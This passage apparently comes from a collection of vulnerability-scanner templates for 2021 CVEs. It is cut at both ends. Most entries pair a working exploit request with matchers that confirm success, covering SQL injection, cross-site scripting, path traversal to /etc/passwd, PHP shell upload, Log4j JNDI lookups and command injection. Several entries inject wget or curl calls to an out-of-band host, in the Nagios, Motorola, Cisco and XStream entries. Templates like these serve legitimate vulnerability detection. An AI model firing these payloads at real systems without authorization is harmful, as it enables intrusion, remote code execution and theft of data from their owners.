Bypass","severity":"high"},"requests":[{"raw":["GET /status.htm HTTP/1.1\nHost: {{Hostname}}\nCookie: language=en; login=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Running Time","Firmware Version","Firmware Build Time"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24750","info":{"name":"WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24472","info":{"name":"Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43287","info":{"name":"Pre-Auth Takeover of Build Pipelines in GoCD","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24347","info":{"name":"WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"cdm_upload_file_field\"\n\n{{nonce}}\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-name\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"{{randstr}}.pHP\"\nContent-Type: image/svg+xml\n\n<?php\n\necho \"CVE-2021-24347\";\n\n?>\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-notes\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"sp-cdm-community-upload\"\n\nUpload\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--\n","GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower(\"{{randstr}}.pHP\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"CVE-2021-24347\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"cdm_upload_file_field\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-24647","info":{"name":"Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_1, \"pieregister\")","contains(body_3, \"Username\") && contains(body_3, \"email-description\")"],"condition":"and"}]}]},{"id":"CVE-2021-21389","info":{"name":"BuddyPress REST API  <7.2.1 - Privilege Escalation/Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-json/buddypress/v1/signup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\n  \"user_login\":\"{{randstr}}\",\n  \"password\":\"{{randstr}}\",\n  \"user_name\":\"{{randstr}}\",\n  \"user_email\":\"{{randstr}}@interact.sh\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["user_login","registered","activation_key","user_email"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45046","info":{"name":"Apache Log4j2 - Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\nAccept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":["interactsh_ip"]},{"type":"regex","group":2,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]},{"type":"regex","group":1,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-25297","info":{"name":"Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["<b>Ping</b>","Switch Details"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-24406","info":{"name":"WordPress wpForo Forum < 1.9.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-22986","info":{"name":"F5 iControl REST -  Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nAuthorization: Basic YWRtaW46\nContent-Type: application/json\nCookie: BIGIPAuthCookie=1234\nConnection: close\n\n{\"username\":\"admin\",\"userReference\":{},\"loginReference\":{\"link\":\"http://localhost/mgmt/shared/gossip\"}}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\nConnection: close\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n"],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"commandResult\":\"(.*)\""],"part":"body"}]}]},{"id":"CVE-2021-3577","info":{"name":"Motorola Baby Monitors - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["set_city_timezone"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37305","info":{"name":"Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username\":\"admin","success\":true","result\":{"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41878","info":{"name":"i-Panel Administration System 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=a onerror=alert(\"document.domain\")>","i-Panel Administration"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21805","info":{"name":"Advantech R-SeeNet 2.4.12 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ping.php?hostname=|dir"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Ping |dir</title>","bottom.php"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25067","info":{"name":"Landing Page Builder < 1.4.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID=test\"+style=animation-name:rotation+onanimationstart=alert(document.domain)+x= HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"test\\\\\\\" style=animation-name:rotation onanimationstart=alert(document.domain)\")","contains(body_2, \"Enter Page Title\")"],"condition":"and"}]}]},{"id":"CVE-2021-40870","info":{"name":"Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /v1/backend1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5(\"CVE-2021-40870\"); ?>\n","GET /v1/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["0d95513363fd69b9fee712f333293654"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36748","info":{"name":"PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 404","contains(body_1, \"prestashop\")","contains(tolower(header_2), 'index.php?controller=404')","len(body_2) == 0"],"condition":"and"}]}]},{"id":"CVE-2021-24214","info":{"name":"WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?login-error=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ERROR (<script>alert(document.domain)</script>):","Login with OpenID Connect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44152","info":{"name":"Reprise License Manager 14.2 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/menu"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Administration Commands"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27309","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>.php"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24275","info":{"name":"Popup by Supsystic <1.10.5 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38314","info":{"name":"WordPress Redux Framework <=4.2.11 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body)<50"]},{"type":"regex","name":"meme","part":"body","regex":["[a-f0-9]{32}"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["[a-f0-9]{32}"],"part":"body"}]}]},{"id":"CVE-2021-21973","info":{"name":"VMware vSphere - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\nHost: {{Hostname}}\nVcip: {{interactsh-url}}\nVcpassword: {{rand_base(6)}}\nVcusername: {{rand_base(6)}}\nReqresource: {{rand_base(6)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The server sent HTTP status code 200"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-1472","info":{"name":"Cisco Small Business RV Series - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nCookie: sessionid='`wget http://{{interactsh-url}}`'\nAuthorization: QUt6NkpTeTE6dmk4cW8=\nContent-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536\n\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"option\"\n\n5NW9Cw1J\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"destination\"\n\nJ0I5k131j2Ku\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file.path\"\n\nEKsmqqg0\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file\"; filename=\"config.xml\"\nContent-Type: application/xml\n\nqJ57CM9\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"filename\"\n\nJbYXJR74n.xml\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"GXbLINHYkFI\"\n\n<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>\n-----------------------------392306610282184777655655237536--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"jsonrpc\":"]}]}]},{"id":"CVE-2021-44528","info":{"name":"Open Redirect in Host Authorization Middleware","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: //interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[301,302,307,308]}]}]},{"id":"CVE-2021-20114","info":{"name":"TCExam <= 14.8.1 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cache/backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /cache/backup","Parent Directory",".sql.gz"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25646","info":{"name":"Apache Druid - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"type\":\"index\",\n\"spec\":{\n   \"ioConfig\":{\n      \"type\":\"index\",\n      \"firehose\":{\n         \"type\":\"local\",\n         \"baseDir\":\"/etc\",\n         \"filter\":\"passwd\"\n      }\n   },\n   \"dataSchema\":{\n      \"dataSource\":\"odgjxrrrePz\",\n      \"parser\":{\n         \"parseSpec\":{\n            \"format\":\"javascript\",\n            \"timestampSpec\":{\n\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"function\":\"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"/bin/sh`@~-c`@~cat /etc/passwd\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"4137368\\\",OQtGXcxBVQVL: hTVCCerYZ}}\",\n            \"\":{\n               \"enabled\":\"true\"\n            }\n         }\n      }\n   }\n},\n\"samplerConfig\":{\n   \"numRows\":10\n}\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["numRowsRead","numRowsIndexed"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21972","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["VSPHERE-UI-JSESSIONID"],"condition":"and"},{"type":"regex","part":"body","regex":["(Install|Config) Final Progress"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27319","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-25074","info":{"name":"WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-29484","info":{"name":"Ghost CMS <=4.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ghost/preview"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XMLHttpRequest.prototype.open"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24891","info":{"name":"WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js","{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200"]},{"type":"regex","part":"body_1","regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"],"internal":true},{"type":"kval","kval":["version"]}]}]},{"id":"CVE-2021-20158","info":{"name":"Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nhtml_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setConnectDevice","setInternet","setWlanSSID","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24227","info":{"name":"Patreon WordPress  <1.7.0 - Unauthenticated Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24997","info":{"name":"WordPress Guppy <=1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"guppyUsers\":","\"userId\":","\"type\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31195","info":{"name":"Microsoft Exchange Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\\&refurl=}}};alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain)//&et=ServerError","mail/bootr.ashx"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-39144","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='sun.tracing.NullProvider'>\n        <active>true</active>\n        <providerType>java.lang.Comparable</providerType>\n        <probes>\n          <entry>\n            <method>\n              <class>java.lang.Comparable</class>\n              <name>compareTo</name>\n              <parameter-types>\n                <class>java.lang.Object</class>\n              </parameter-types>\n            </method>\n            <sun.tracing.dtrace.DTraceProbe>\n              <proxy class='java.lang.Runtime'/>\n              <implementing__method>\n                <class>java.lang.Runtime</class>\n                <name>exec</name>\n                <parameter-types>\n                  <class>java.lang.String</class>\n                </parameter-types>\n              </implementing__method>\n            </sun.tracing.dtrace.DTraceProbe>\n          </entry>\n        </probes>\n      </handler>\n    </dynamic-proxy>\n    <string>curl http://{{interactsh-url}}</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-40822","info":{"name":"Geoserver - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /geoserver/TestWfsPost HTTP/1.1\nHost: oast.pro\nContent-Type: application/x-www-form-urlencoded\n\nform_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<b>Interactsh</b>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27320","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-40978","info":{"name":"MKdocs 1.2.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38647","info":{"name":"Microsoft Open Management Infrastructure - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wsman HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml;charset=UTF-8\n\n<s:Envelope\n  xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\"\n  xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\"\n  